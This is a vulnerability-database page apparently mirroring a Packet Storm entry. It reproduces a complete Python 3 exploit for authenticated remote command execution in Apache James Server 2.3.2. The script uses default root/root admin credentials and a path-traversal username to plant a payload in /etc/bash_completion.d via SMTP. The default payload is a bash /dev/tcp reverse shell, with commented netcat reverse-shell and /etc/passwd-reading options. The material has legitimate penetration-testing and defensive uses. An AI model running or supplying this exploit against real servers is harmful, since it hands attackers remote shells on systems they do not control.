Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apache James Server 2.3.2 Remote Command Execution

🗓️ 28 Sep 2021 00:00:00Reported by shinris3nType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 252 Views

Apache James Server 2.3.2 Remote Command Execution, RCE on default install, Python 3 implementation for exploit, payload selection, netcat listener synta

Code
`# Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)  
# Date: 27/09/2021  
# Exploit Author: shinris3n  
# Vendor Homepage: http://james.apache.org/server/  
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip  
# Version: Apache James Server 2.3.2  
# Tested on: Ubuntu  
# Info: This exploit works on default installation of Apache James Server 2.3.2  
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d  
  
'''  
This Python 3 implementation is based on the original (Python 2) exploit code developed by   
Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec. The following modifications were made:  
  
1 - Made required changes to print and socket commands for Python 3 compatibility.  
1 - Changed the default payload to a basic bash reverse shell script and added a netcat option.  
2 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2.  
3 - Added a payload that can be used for testing remote command execution and connectivity.  
4 - Added payload and listener information output based on payload selection and user input.  
5 - Added execution output clarifications and additional informational comments throughout the code.  
  
@shinris3n  
https://twitter.com/shinris3n  
https://shinris3n.github.io/  
'''  
  
#!/usr/bin/python3  
  
import socket  
import sys  
import time  
  
# credentials to James Remote Administration Tool (Default - root/root)  
user = 'root'  
pwd = 'root'  
  
if len(sys.argv) != 4:  
sys.stderr.write("[-]Usage: python3 %s <remote ip> <local ip> <local listener port>\n" % sys.argv[0])  
sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0])  
sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n")  
sys.exit(1)  
  
remote_ip = sys.argv[1]  
local_ip = sys.argv[2]  
port = sys.argv[3]  
  
# Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH)  
payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login  
#payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell  
#payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity  
#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only  
  
print ("[+]Payload Selected (see script for more options): ", payload)  
if '/bin/bash' in payload:  
print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port)  
  
  
def recv(s):  
s.recv(1024)  
time.sleep(0.2)  
  
try:  
print ("[+]Connecting to James Remote Administration Tool...")  
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary.  
s.recv(1024)  
s.send((user + "\n").encode('utf-8'))  
s.recv(1024)  
s.send((pwd + "\n").encode('utf-8'))  
s.recv(1024)  
print ("[+]Creating user...")  
s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8'))  
s.recv(1024)  
s.send("quit\n".encode('utf-8'))  
s.close()  
  
print ("[+]Connecting to James SMTP server...")  
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary.  
s.send("ehlo [email protected]\r\n".encode('utf-8'))  
recv(s)  
print ("[+]Sending payload...")  
s.send("mail from: <'@team.pl>\r\n".encode('utf-8'))  
recv(s)  
# also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be found  
s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8'))  
recv(s)  
s.send("data\r\n".encode('utf-8'))  
recv(s)  
s.send("From: [email protected]\r\n".encode('utf-8'))  
s.send("\r\n".encode('utf-8'))  
s.send("'\n".encode('utf-8'))  
s.send((payload + "\n").encode('utf-8'))  
s.send("\r\n.\r\n".encode('utf-8'))  
recv(s)  
s.send("quit\r\n".encode('utf-8'))  
recv(s)  
s.close()  
print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).")  
if '/bin/bash' in payload:  
print ("[+]Don't forget to start a listener on port", port, "before logging in!")  
except:  
print ("Connection failed.")  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Sep 2021 00:00Current
7.4High risk
Vulners AI Score7.4
apache james serverremote command executionrcedefault installationpython 3exploitpayloadnetcat listener
252